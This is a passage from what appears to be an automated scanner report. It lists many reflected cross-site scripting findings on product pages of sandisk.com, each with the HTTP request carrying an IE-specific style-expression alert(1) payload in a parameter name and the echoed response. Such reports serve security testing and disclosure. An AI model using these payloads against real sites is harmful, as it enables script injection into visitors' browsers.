Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26666
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/dslr/sandisk-ultra-sdxc-cards?c301f"style="x:expression(alert(1))"2ab41aca7da=1?tab=review">
...[SNIP]...

1.15. http://www.sandisk.com/products/gaming-cards/sandisk-gaming-compatibility-pack [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/gaming-cards/sandisk-gaming-compatibility-pack

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0cbd"style%3d"x%3aexpression(alert(1))"3ac5ff1664d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c0cbd"style="x:expression(alert(1))"3ac5ff1664d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/gaming-cards/sandisk-gaming-compatibility-pack?c0cbd"style%3d"x%3aexpression(alert(1))"3ac5ff1664d=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26255
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:44:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/gaming-cards/sandisk-gaming-compatibility-pack?c0cbd"style="x:expression(alert(1))"3ac5ff1664d=1?tab=review">
...[SNIP]...

1.16. http://www.sandisk.com/products/gaming-cards/sandisk-memory-stick-micro-m2 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/gaming-cards/sandisk-memory-stick-micro-m2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b36"style%3d"x%3aexpression(alert(1))"f4d102a6648 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8b36"style="x:expression(alert(1))"f4d102a6648 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/gaming-cards/sandisk-memory-stick-micro-m2?f8b36"style%3d"x%3aexpression(alert(1))"f4d102a6648=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33763
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:45:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/gaming-cards/sandisk-memory-stick-micro-m2?f8b36"style="x:expression(alert(1))"f4d102a6648=1?tab=review">
...[SNIP]...

1.17. http://www.sandisk.com/products/gaming-cards/sandisk-xbox-360-usb-flash-drive [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/gaming-cards/sandisk-xbox-360-usb-flash-drive

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feae6"style%3d"x%3aexpression(alert(1))"d34acc7bf93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as feae6"style="x:expression(alert(1))"d34acc7bf93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/gaming-cards/sandisk-xbox-360-usb-flash-drive?feae6"style%3d"x%3aexpression(alert(1))"d34acc7bf93=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49552
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/gaming-cards/sandisk-xbox-360-usb-flash-drive?feae6"style="x:expression(alert(1))"d34acc7bf93=1?tab=review">
...[SNIP]...

1.18. http://www.sandisk.com/products/imaging/sandisk-extreme-sdhc-cards- [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/imaging/sandisk-extreme-sdhc-cards-

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80206"style%3d"x%3aexpression(alert(1))"ed3bde58f47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80206"style="x:expression(alert(1))"ed3bde58f47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/imaging/sandisk-extreme-sdhc-cards-?80206"style%3d"x%3aexpression(alert(1))"ed3bde58f47=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33480
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/imaging/sandisk-extreme-sdhc-cards-?80206"style="x:expression(alert(1))"ed3bde58f47=1?tab=review">
...[SNIP]...

1.19. http://www.sandisk.com/products/imaging/sandisk-ultra-memory-stick-pro-hg-duo [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/imaging/sandisk-ultra-memory-stick-pro-hg-duo

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69b7a"style%3d"x%3aexpression(alert(1))"a61104fe1c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69b7a"style="x:expression(alert(1))"a61104fe1c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/imaging/sandisk-ultra-memory-stick-pro-hg-duo?69b7a"style%3d"x%3aexpression(alert(1))"a61104fe1c0=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35816
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:44:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/imaging/sandisk-ultra-memory-stick-pro-hg-duo?69b7a"style="x:expression(alert(1))"a61104fe1c0=1?tab=review">
...[SNIP]...

1.20. http://www.sandisk.com/products/mobile-memory-products/sandisk-memory-stick-micro-m2 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/mobile-memory-products/sandisk-memory-stick-micro-m2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c726"style%3d"x%3aexpression(alert(1))"10b48f71d65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2c726"style="x:expression(alert(1))"10b48f71d65 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/mobile-memory-products/sandisk-memory-stick-micro-m2?2c726"style%3d"x%3aexpression(alert(1))"10b48f71d65=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-network-operators
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33197
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/mobile-memory-products/sandisk-memory-stick-micro-m2?2c726"style="x:expression(alert(1))"10b48f71d65=1?tab=review">
...[SNIP]...

1.21. http://www.sandisk.com/products/mobile-memory-products/sandisk-memory-stick-micro-m2.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/mobile-memory-products/sandisk-memory-stick-micro-m2.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 952bd"style%3d"x%3aexpression(alert(1))"d9ef4911efd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 952bd"style="x:expression(alert(1))"d9ef4911efd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/mobile-memory-products/sandisk-memory-stick-micro-m2.aspx?952bd"style%3d"x%3aexpression(alert(1))"d9ef4911efd=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-network-operators
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33207
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/mobile-memory-products/sandisk-memory-stick-micro-m2.aspx?952bd"style="x:expression(alert(1))"d9ef4911efd=1?tab=review">
...[SNIP]...

1.22. http://www.sandisk.com/products/mobile-memory-products/sandisk-microsdhc [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/mobile-memory-products/sandisk-microsdhc

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5bed"style%3d"x%3aexpression(alert(1))"58b950f600b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c5bed"style="x:expression(alert(1))"58b950f600b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/mobile-memory-products/sandisk-microsdhc?c5bed"style%3d"x%3aexpression(alert(1))"58b950f600b=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33104
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/mobile-memory-products/sandisk-microsdhc?c5bed"style="x:expression(alert(1))"58b950f600b=1?tab=review">
...[SNIP]...

1.23. http://www.sandisk.com/products/mobile-memory-products/sandisk-microsdhc.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/mobile-memory-products/sandisk-microsdhc.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f99b"style%3d"x%3aexpression(alert(1))"f056f50e3ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7f99b"style="x:expression(alert(1))"f056f50e3ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/mobile-memory-products/sandisk-microsdhc.aspx?7f99b"style%3d"x%3aexpression(alert(1))"f056f50e3ad=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-network-operators
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33114
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/mobile-memory-products/sandisk-microsdhc.aspx?7f99b"style="x:expression(alert(1))"f056f50e3ad=1?tab=review">
...[SNIP]...

1.24. http://www.sandisk.com/products/mobile-memory-products/sandisk-mobile-ultra-microsd-microsdhc [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/mobile-memory-products/sandisk-mobile-ultra-microsd-microsdhc

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52c2a"style%3d"x%3aexpression(alert(1))"d7e158940b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 52c2a"style="x:expression(alert(1))"d7e158940b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/mobile-memory-products/sandisk-mobile-ultra-microsd-microsdhc?52c2a"style%3d"x%3aexpression(alert(1))"d7e158940b0=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30129
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/mobile-memory-products/sandisk-mobile-ultra-microsd-microsdhc?52c2a"style="x:expression(alert(1))"d7e158940b0=1?tab=review">
...[SNIP]...

1.25. http://www.sandisk.com/products/mobile-memory-products/sandisk-mobilemate-micro-reader.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/mobile-memory-products/sandisk-mobilemate-micro-reader.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b05e3"style%3d"x%3aexpression(alert(1))"9864d6d6b83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b05e3"style="x:expression(alert(1))"9864d6d6b83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/mobile-memory-products/sandisk-mobilemate-micro-reader.aspx?b05e3"style%3d"x%3aexpression(alert(1))"9864d6d6b83=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-network-operators
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26366
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/mobile-memory-products/sandisk-mobilemate-micro-reader.aspx?b05e3"style="x:expression(alert(1))"9864d6d6b83=1?tab=review">
...[SNIP]...

1.26. http://www.sandisk.com/products/netbook-cards/sandisk-netbook-sdhc-memory-card [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/netbook-cards/sandisk-netbook-sdhc-memory-card

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6826b"style%3d"x%3aexpression(alert(1))"3306417ccb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6826b"style="x:expression(alert(1))"3306417ccb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/netbook-cards/sandisk-netbook-sdhc-memory-card?6826b"style%3d"x%3aexpression(alert(1))"3306417ccb9=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32328
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/netbook-cards/sandisk-netbook-sdhc-memory-card?6826b"style="x:expression(alert(1))"3306417ccb9=1?tab=review">
...[SNIP]...

1.27. http://www.sandisk.com/products/readers-accessories/large-memory-card-case [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories/large-memory-card-case

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2624e"style%3d"x%3aexpression(alert(1))"78a0d731df7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2624e"style="x:expression(alert(1))"78a0d731df7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/readers-accessories/large-memory-card-case?2624e"style%3d"x%3aexpression(alert(1))"78a0d731df7=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24292
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:44:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/readers-accessories/large-memory-card-case?2624e"style="x:expression(alert(1))"78a0d731df7=1?tab=review">
...[SNIP]...

1.28. http://www.sandisk.com/products/readers-accessories/micromate-sdhc [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/readers-accessories/micromate-sdhc

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91afa"style%3d"x%3aexpression(alert(1))"f06b3bb7095 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91afa"style="x:expression(alert(1))"f06b3bb7095 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/readers-accessories/micromate-sdhc?91afa"style%3d"x%3aexpression(alert(1))"f06b3bb7095=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25367
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:45:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
